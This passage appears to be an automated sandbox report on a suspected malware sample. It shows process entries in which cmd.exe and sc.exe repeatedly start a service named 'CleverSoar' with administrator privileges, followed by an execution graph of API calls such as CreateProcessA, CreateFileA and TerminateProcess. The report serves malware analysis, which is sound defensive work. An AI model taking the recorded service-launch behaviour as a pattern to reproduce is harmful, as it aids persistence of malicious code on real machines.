                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:86
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:87
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:88
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:89
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:90
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:91
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:92
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:93
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:94
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:95
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:96
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:97
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:98
                                        Start time:03:24:19
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:99
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:100
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:101
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:102
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:103
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:104
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:105
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:106
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:107
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:108
                                        Start time:03:24:20
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:1.6%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:15.5%
                                          Total number of Nodes:792
                                          Total number of Limit Nodes:13
                                          execution_graph 99977 6cc5cad3 99978 6cc5cae5 __dosmaperr 99977->99978 99979 6cc5cafd 99977->99979 99979->99978 99980 6cc5cb77 99979->99980 99982 6cc5cb48 __dosmaperr 99979->99982 99983 6cc5cb90 99980->99983 99984 6cc5cbe7 __wsopen_s 99980->99984 99985 6cc5cbab __dosmaperr 99980->99985 100024 6cc50120 18 API calls __fassign 99982->100024 99983->99985 100005 6cc5cb95 99983->100005 100018 6cc547bb HeapFree GetLastError __dosmaperr 99984->100018 100017 6cc50120 18 API calls __fassign 99985->100017 99988 6cc5cd3e 99991 6cc5cdb4 99988->99991 99994 6cc5cd57 GetConsoleMode 99988->99994 99989 6cc5cc07 100019 6cc547bb HeapFree GetLastError __dosmaperr 99989->100019 99993 6cc5cdb8 ReadFile 99991->99993 99997 6cc5cdd2 99993->99997 99998 6cc5ce2c GetLastError 99993->99998 99994->99991 99995 6cc5cd68 99994->99995 99995->99993 99999 6cc5cd6e ReadConsoleW 99995->99999 99996 6cc5cc0e 100002 6cc5cbc2 __dosmaperr __wsopen_s 99996->100002 100020 6cc5ac69 20 API calls __wsopen_s 99996->100020 99997->99998 100004 6cc5cda9 99997->100004 99998->100002 100000 6cc5cd8a GetLastError 99999->100000 99999->100004 100000->100002 100021 6cc547bb HeapFree GetLastError __dosmaperr 100002->100021 100004->100002 100006 6cc5cdf7 100004->100006 100007 6cc5ce0e 100004->100007 100012 6cc619e5 100005->100012 100022 6cc5cefe 23 API calls 3 library calls 100006->100022 100007->100002 100009 6cc5ce25 100007->100009 100023 6cc5d1b6 21 API calls __wsopen_s 100009->100023 100011 6cc5ce2a 100011->100002 100013 6cc619f2 100012->100013 100015 6cc619ff 100012->100015 100013->99988 100014 6cc61a0b 100014->99988 100015->100014 100025 6cc50120 18 API calls __fassign 100015->100025 100017->100002 100018->99989 100019->99996 100020->100005 100021->99978 100022->100002 100023->100011 100024->99978 100025->100013 100026 6cad4a27 100030 6cad4a5d _strlen 100026->100030 100027 6cae639e 100158 6cc50130 18 API calls 2 library calls 100027->100158 100028 6cad5b6f 100032 6cc46a43 std::_Facet_Register 4 API calls 100028->100032 100029 6cad5b58 100144 6cc46a43 100029->100144 100030->100027 100030->100028 100030->100029 100034 6cad5b09 _Yarn 100030->100034 100032->100034 100117 6cc3aec0 100034->100117 100037 6cad5bad std::ios_base::_Ios_base_dtor 100037->100027 100040 6cad9ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100037->100040 100123 6cc44ff0 CreateProcessA 100037->100123 100038 6cc46a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100038->100040 100039 6cc3aec0 2 API calls 100039->100040 100040->100027 100040->100038 100040->100039 100041 6cada292 Sleep 100040->100041 100060 6cade619 100040->100060 100081 6cad9bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 100041->100081 100042 6cad660d 100044 6cc46a43 std::_Facet_Register 4 API calls 100042->100044 100043 6cad6624 100045 6cc46a43 std::_Facet_Register 4 API calls 100043->100045 100053 6cad65bc _Yarn _strlen 100044->100053 100045->100053 100046 6cad61cb _strlen 100046->100027 100046->100042 100046->100043 100046->100053 100047 6cad9bbd GetCurrentProcess TerminateProcess 100047->100040 100048 6cae63b2 100159 6cac15e0 18 API calls std::ios_base::_Ios_base_dtor 100048->100159 100050 6cae64f8 100051 6cad6989 100055 6cc46a43 std::_Facet_Register 4 API calls 100051->100055 100052 6cad6970 100054 6cc46a43 std::_Facet_Register 4 API calls 100052->100054 100053->100048 100053->100051 100053->100052 100056 6cad6920 _Yarn 100053->100056 100054->100056 100055->100056 100127 6cc45960 100056->100127 100058 6cc46a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100058->100081 100059 6cadf243 CreateFileA 100075 6cadf2a7 100059->100075 100060->100059 100061 6cad69d6 std::ios_base::_Ios_base_dtor _strlen 100061->100027 100062 6cad6dbb 100061->100062 100063 6cad6dd2 100061->100063 100071 6cad6d69 _Yarn _strlen 100061->100071 100065 6cc46a43 std::_Facet_Register 4 API calls 100062->100065 100066 6cc46a43 std::_Facet_Register 4 API calls 100063->100066 100064 6cae02ca 100065->100071 100066->100071 100067 6cad7427 100069 6cc46a43 std::_Facet_Register 4 API calls 100067->100069 100068 6cad7440 100070 6cc46a43 std::_Facet_Register 4 API calls 100068->100070 100072 6cad73da _Yarn 100069->100072 100070->100072 100071->100048 100071->100067 100071->100068 100071->100072 100073 6cc45960 104 API calls 100072->100073 100076 6cad748d std::ios_base::_Ios_base_dtor _strlen 100073->100076 100074 6cae02ac GetCurrentProcess TerminateProcess 100074->100064 100075->100064 100075->100074 100076->100027 100077 6cad79a8 100076->100077 100078 6cad7991 100076->100078 100082 6cad7940 _Yarn _strlen 100076->100082 100080 6cc46a43 std::_Facet_Register 4 API calls 100077->100080 100079 6cc46a43 std::_Facet_Register 4 API calls 100078->100079 100079->100082 100080->100082 100081->100027 100081->100040 100081->100047 100081->100048 100081->100058 100115 6cc45960 104 API calls 100081->100115 100116 6cc44ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 100081->100116 100082->100048 100083 6cad7dc9 100082->100083 100084 6cad7de2 100082->100084 100087 6cad7d7c _Yarn 100082->100087 100085 6cc46a43 std::_Facet_Register 4 API calls 100083->100085 100086 6cc46a43 std::_Facet_Register 4 API calls 100084->100086 100085->100087 100086->100087 100088 6cc45960 104 API calls 100087->100088 100089 6cad7e2f std::ios_base::_Ios_base_dtor _strlen 100088->100089 100089->100027 100090 6cad85bf 100089->100090 100091 6cad85a8 100089->100091 100099 6cad8556 _Yarn _strlen 100089->100099 100093 6cc46a43 std::_Facet_Register 4 API calls 100090->100093 100092 6cc46a43 std::_Facet_Register 4 API calls 100091->100092 100092->100099 100093->100099 100094 6cad896a 100096 6cc46a43 std::_Facet_Register 4 API calls 100094->100096 100095 6cad8983 100097 6cc46a43 std::_Facet_Register 4 API calls 100095->100097 100098 6cad891d _Yarn 100096->100098 100097->100098 100100 6cc45960 104 API calls 100098->100100 100099->100048 100099->100094 100099->100095 100099->100098 100101 6cad89d0 std::ios_base::_Ios_base_dtor _strlen 100100->100101 100101->100027 100102 6cad8f1f 100101->100102 100103 6cad8f36 100101->100103 100106 6cad8ecd _Yarn _strlen 100101->100106 100104 6cc46a43 std::_Facet_Register 4 API calls 100102->100104 100105 6cc46a43 std::_Facet_Register 4 API calls 100103->100105 100104->100106 100105->100106 100106->100048 100107 6cad936d 100106->100107 100108 6cad9354 100106->100108 100111 6cad9307 _Yarn 100106->100111 100110 6cc46a43 std::_Facet_Register 4 API calls 100107->100110 100109 6cc46a43 std::_Facet_Register 4 API calls 100108->100109 100109->100111 100110->100111 100112 6cc45960 104 API calls 100111->100112 100114 6cad93ba std::ios_base::_Ios_base_dtor 100112->100114 100113 6cc44ff0 4 API calls 100113->100040 100114->100027 100114->100113 100115->100081 100116->100081 100118 6cc3aed6 FindFirstFileA 100117->100118 100119 6cc3aed4 100117->100119 100120 6cc3af10 100118->100120 100119->100118 100121 6cc3af14 FindClose 100120->100121 100122 6cc3af72 100120->100122 100121->100120 100122->100037 100124 6cc450ca 100123->100124 100125 6cc45080 WaitForSingleObject CloseHandle CloseHandle 100124->100125 100126 6cc450e3 100124->100126 100125->100124 100126->100046 100128 6cc459b7 100127->100128 100160 6cc45ff0 100128->100160 100130 6cc459c8 100179 6cae6ba0 100130->100179 100133 6cc45a9f std::ios_base::_Ios_base_dtor 100136 6cb0e010 67 API calls 100133->100136 100135 6cc459ec 100137 6cc45a54 100135->100137 100143 6cc45a67 100135->100143 100198 6cc46340 100135->100198 100206 6cb22000 100135->100206 100140 6cc45ae2 std::ios_base::_Ios_base_dtor 100136->100140 100216 6cc45b90 100137->100216 100140->100061 100141 6cc45a5c 100237 6cae7090 100141->100237 100231 6cb0e010 100143->100231 100146 6cc46a48 100144->100146 100145 6cc46a62 100145->100034 100146->100145 100149 6cc46a64 std::_Facet_Register 100146->100149 100690 6cc4f014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100146->100690 100148 6cc478c3 std::_Facet_Register 100694 6cc49379 RaiseException 100148->100694 100149->100148 100691 6cc49379 RaiseException 100149->100691 100151 6cc480bc IsProcessorFeaturePresent 100157 6cc480e1 100151->100157 100153 6cc47883 100692 6cc49379 RaiseException 100153->100692 100155 6cc478a3 std::invalid_argument::invalid_argument 100693 6cc49379 RaiseException 100155->100693 100157->100034 100159->100050 100161 6cc46025 100160->100161 100250 6cb12020 100161->100250 100163 6cc460c6 100164 6cc46a43 std::_Facet_Register 4 API calls 100163->100164 100165 6cc460fe 100164->100165 100267 6cc47327 100165->100267 100167 6cc46112 100279 6cb11d90 100167->100279 100170 6cc461ec 100170->100130 100172 6cc46226 100287 6cb126e0 24 API calls 4 library calls 100172->100287 100174 6cc46238 100288 6cc49379 RaiseException 100174->100288 100176 6cc4624d 100177 6cb0e010 67 API calls 100176->100177 100178 6cc4625f 100177->100178 100178->100130 100180 6cae6bd5 100179->100180 100181 6cb12020 52 API calls 100180->100181 100182 6cae6c68 100181->100182 100183 6cc46a43 std::_Facet_Register 4 API calls 100182->100183 100184 6cae6ca0 100183->100184 100185 6cc47327 43 API calls 100184->100185 100186 6cae6cb4 100185->100186 100187 6cb11d90 89 API calls 100186->100187 100188 6cae6d5d 100187->100188 100189 6cae6d8e 100188->100189 100598 6cb12250 30 API calls 100188->100598 100189->100135 100191 6cae6dc8 100599 6cb126e0 24 API calls 4 library calls 100191->100599 100193 6cae6dda 100600 6cc49379 RaiseException 100193->100600 100195 6cae6def 100196 6cb0e010 67 API calls 100195->100196 100197 6cae6e0f 100196->100197 100197->100135 100199 6cc4638d 100198->100199 100601 6cc465a0 100199->100601 100201 6cc4647c 100201->100135 100205 6cc463a5 100205->100201 100619 6cb12250 30 API calls 100205->100619 100620 6cb126e0 24 API calls 4 library calls 100205->100620 100621 6cc49379 RaiseException 100205->100621 100207 6cb2203f 100206->100207 100213 6cb22053 100207->100213 100630 6cb13560 32 API calls std::_Xinvalid_argument 100207->100630 100211 6cb22121 100211->100135 100212 6cb2210e 100212->100211 100631 6cb137e0 32 API calls std::_Xinvalid_argument 100212->100631 100213->100212 100632 6cb12250 30 API calls 100213->100632 100633 6cb126e0 24 API calls 4 library calls 100213->100633 100634 6cc49379 RaiseException 100213->100634 100217 6cc45b9e 100216->100217 100221 6cc45bd1 100216->100221 100635 6cb101f0 100217->100635 100219 6cc45c83 100219->100141 100221->100219 100639 6cb12250 30 API calls 100221->100639 100222 6cc50b18 67 API calls 100222->100221 100224 6cc45cae 100640 6cb12340 24 API calls 100224->100640 100226 6cc45cbe 100641 6cc49379 RaiseException 100226->100641 100228 6cc45cc9 100229 6cb0e010 67 API calls 100228->100229 100230 6cc45d22 std::ios_base::_Ios_base_dtor 100229->100230 100230->100141 100232 6cb0e04b 100231->100232 100233 6cb101f0 64 API calls 100232->100233 100234 6cb0e0a3 100232->100234 100235 6cb0e098 100233->100235 100234->100133 100236 6cc50b18 67 API calls 100235->100236 100236->100234 100238 6cae709e 100237->100238 100242 6cae70d1 100237->100242 100239 6cb101f0 64 API calls 100238->100239 100241 6cae70c4 100239->100241 100240 6cae7183 100240->100143 100243 6cc50b18 67 API calls 100241->100243 100242->100240 100687 6cb12250 30 API calls 100242->100687 100243->100242 100245 6cae71ae 100688 6cb12340 24 API calls 100245->100688 100247 6cae71be 100689 6cc49379 RaiseException 100247->100689 100249 6cae71c9 100251 6cc46a43 std::_Facet_Register 4 API calls 100250->100251 100252 6cb1207e 100251->100252 100253 6cc47327 43 API calls 100252->100253 100254 6cb12092 100253->100254 100289 6cb12f60 42 API calls 4 library calls 100254->100289 100256 6cb120c8 100257 6cb12136 100256->100257 100259 6cb1210d 100256->100259 100291 6cb12250 30 API calls 100257->100291 100258 6cb12120 100258->100163 100259->100258 100290 6cc46f8e 9 API calls 2 library calls 100259->100290 100262 6cb1215b 100292 6cb12340 24 API calls 100262->100292 100264 6cb12171 100293 6cc49379 RaiseException 100264->100293 100266 6cb1217c 100266->100163 100268 6cc47333 __EH_prolog3 100267->100268 100294 6cc46eb5 100268->100294 100273 6cc47351 100308 6cc473ba 39 API calls std::locale::_Setgloballocale 100273->100308 100274 6cc4736f 100300 6cc46ee6 100274->100300 100276 6cc473ac 100276->100167 100277 6cc47359 100309 6cc471b1 HeapFree GetLastError _Yarn ___std_exception_destroy 100277->100309 100280 6cb11dc7 100279->100280 100281 6cb11ddc 100279->100281 100280->100170 100286 6cb12250 30 API calls 100280->100286 100314 6cc47447 100281->100314 100285 6cb11e82 100286->100172 100287->100174 100288->100176 100289->100256 100290->100258 100291->100262 100292->100264 100293->100266 100295 6cc46ec4 100294->100295 100296 6cc46ecb 100294->100296 100310 6cc503cd 6 API calls std::_Lockit::_Lockit 100295->100310 100298 6cc46ec9 100296->100298 100311 6cc4858b EnterCriticalSection 100296->100311 100298->100274 100307 6cc47230 6 API calls 2 library calls 100298->100307 100301 6cc46ef0 100300->100301 100302 6cc503db 100300->100302 100304 6cc46f03 100301->100304 100312 6cc48599 LeaveCriticalSection 100301->100312 100313 6cc503b6 LeaveCriticalSection 100302->100313 100304->100276 100305 6cc503e2 100305->100276 100307->100273 100308->100277 100309->100274 100310->100298 100311->100298 100312->100304 100313->100305 100317 6cc47450 100314->100317 100316 6cb11dea 100316->100280 100322 6cc4c563 18 API calls __fassign 100316->100322 100317->100316 100323 6cc4fd4a 100317->100323 100318 6cc4749c 100318->100316 100334 6cc4fa58 65 API calls 100318->100334 100320 6cc474b7 100320->100316 100335 6cc50b18 100320->100335 100322->100285 100324 6cc4fd55 __wsopen_s 100323->100324 100325 6cc4fd68 100324->100325 100326 6cc4fd88 100324->100326 100360 6cc50120 18 API calls __fassign 100325->100360 100333 6cc4fd78 100326->100333 100346 6cc5ae0c 100326->100346 100333->100318 100334->100320 100336 6cc50b24 __wsopen_s 100335->100336 100337 6cc50b43 100336->100337 100338 6cc50b2e 100336->100338 100342 6cc50b3e 100337->100342 100469 6cc4c5a9 EnterCriticalSection 100337->100469 100484 6cc50120 18 API calls __fassign 100338->100484 100341 6cc50b60 100470 6cc50b9c 100341->100470 100342->100316 100344 6cc50b6b 100485 6cc50b92 LeaveCriticalSection 100344->100485 100347 6cc5ae18 __wsopen_s 100346->100347 100362 6cc5039f EnterCriticalSection 100347->100362 100349 6cc5ae26 100363 6cc5aeb0 100349->100363 100354 6cc5af72 100355 6cc5b091 100354->100355 100387 6cc5b114 100355->100387 100359 6cc4fdcc 100361 6cc4fdf5 LeaveCriticalSection 100359->100361 100360->100333 100361->100333 100362->100349 100371 6cc5aed3 100363->100371 100364 6cc5ae33 100377 6cc5ae6c 100364->100377 100365 6cc5af2b 100382 6cc571e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100365->100382 100367 6cc5af34 100383 6cc547bb HeapFree GetLastError __dosmaperr 100367->100383 100370 6cc5af3d 100370->100364 100384 6cc56c1f 6 API calls std::_Lockit::_Lockit 100370->100384 100371->100364 100371->100365 100371->100371 100380 6cc4c5a9 EnterCriticalSection 100371->100380 100381 6cc4c5bd LeaveCriticalSection 100371->100381 100373 6cc5af5c 100385 6cc4c5a9 EnterCriticalSection 100373->100385 100376 6cc5af6f 100376->100364 100386 6cc503b6 LeaveCriticalSection 100377->100386 100379 6cc4fda3 100379->100333 100379->100354 100380->100371 100381->100371 100382->100367 100383->100370 100384->100373 100385->100376 100386->100379 100388 6cc5b133 100387->100388 100389 6cc5b146 100388->100389 100391 6cc5b15b 100388->100391 100403 6cc50120 18 API calls __fassign 100389->100403 100392 6cc5b27b 100391->100392 100404 6cc63ea8 37 API calls __fassign 100391->100404 100393 6cc5b0a7 100392->100393 100407 6cc50120 18 API calls __fassign 100392->100407 100393->100359 100400 6cc63fde 100393->100400 100396 6cc5b2cb 100396->100392 100405 6cc63ea8 37 API calls __fassign 100396->100405 100398 6cc5b2e9 100398->100392 100406 6cc63ea8 37 API calls __fassign 100398->100406 100408 6cc64396 100400->100408 100403->100393 100404->100396 100405->100398 100406->100392 100407->100393 100410 6cc643a2 __wsopen_s 100408->100410 100409 6cc643a9 100426 6cc50120 18 API calls __fassign 100409->100426 100410->100409 100411 6cc643d4 100410->100411 100417 6cc63ffe 100411->100417 100416 6cc63ff9 100416->100359 100428 6cc506cb 100417->100428 100422 6cc64034 100424 6cc64066 100422->100424 100468 6cc547bb HeapFree GetLastError __dosmaperr 100422->100468 100427 6cc6442b LeaveCriticalSection __wsopen_s 100424->100427 100426->100416 100427->100416 100429 6cc4bceb __fassign 37 API calls 100428->100429 100430 6cc506dd 100429->100430 100431 6cc506ef 100430->100431 100432 6cc569d5 __wsopen_s 5 API calls 100430->100432 100433 6cc4bdf6 100431->100433 100432->100431 100434 6cc4be4e __wsopen_s GetLastError HeapFree GetLastError MultiByteToWideChar 100433->100434 100435 6cc4be0e 100434->100435 100435->100422 100436 6cc6406c 100435->100436 100437 6cc644ec __wsopen_s 18 API calls 100436->100437 100438 6cc64089 100437->100438 100439 6cc6160c __wsopen_s 14 API calls 100438->100439 100443 6cc6409e __dosmaperr 100438->100443 100440 6cc640bc 100439->100440 100441 6cc64457 __wsopen_s CreateFileW 100440->100441 100440->100443 100448 6cc64115 100441->100448 100442 6cc64192 GetFileType 100444 6cc641e4 100442->100444 100445 6cc6419d GetLastError 100442->100445 100443->100422 100451 6cc617b0 __wsopen_s SetStdHandle 100444->100451 100447 6cc4f9f2 __dosmaperr 100445->100447 100446 6cc64167 GetLastError 100446->100443 100449 6cc641ab CloseHandle 100447->100449 100448->100442 100448->100446 100450 6cc64457 __wsopen_s CreateFileW 100448->100450 100449->100443 100464 6cc641d4 100449->100464 100452 6cc6415a 100450->100452 100453 6cc64205 100451->100453 100452->100442 100452->100446 100454 6cc64251 100453->100454 100456 6cc64666 __wsopen_s 70 API calls 100453->100456 100455 6cc64710 __wsopen_s 70 API calls 100454->100455 100458 6cc64258 100454->100458 100457 6cc64286 100455->100457 100456->100454 100457->100458 100459 6cc64294 100457->100459 100460 6cc5b925 __wsopen_s 21 API calls 100458->100460 100459->100443 100461 6cc64310 CloseHandle 100459->100461 100460->100443 100462 6cc64457 __wsopen_s CreateFileW 100461->100462 100463 6cc6433b 100462->100463 100463->100464 100465 6cc64345 GetLastError 100463->100465 100464->100443 100466 6cc64351 __dosmaperr 100465->100466 100467 6cc6171f __wsopen_s SetStdHandle 100466->100467 100467->100464 100468->100424 100469->100341 100471 6cc50bbe 100470->100471 100472 6cc50ba9 100470->100472 100476 6cc50bb9 100471->100476 100486 6cc50cb9 100471->100486 100508 6cc50120 18 API calls __fassign 100472->100508 100476->100344 100480 6cc50be1 100501 6cc5b898 100480->100501 100482 6cc50be7 100482->100476 100509 6cc547bb HeapFree GetLastError __dosmaperr 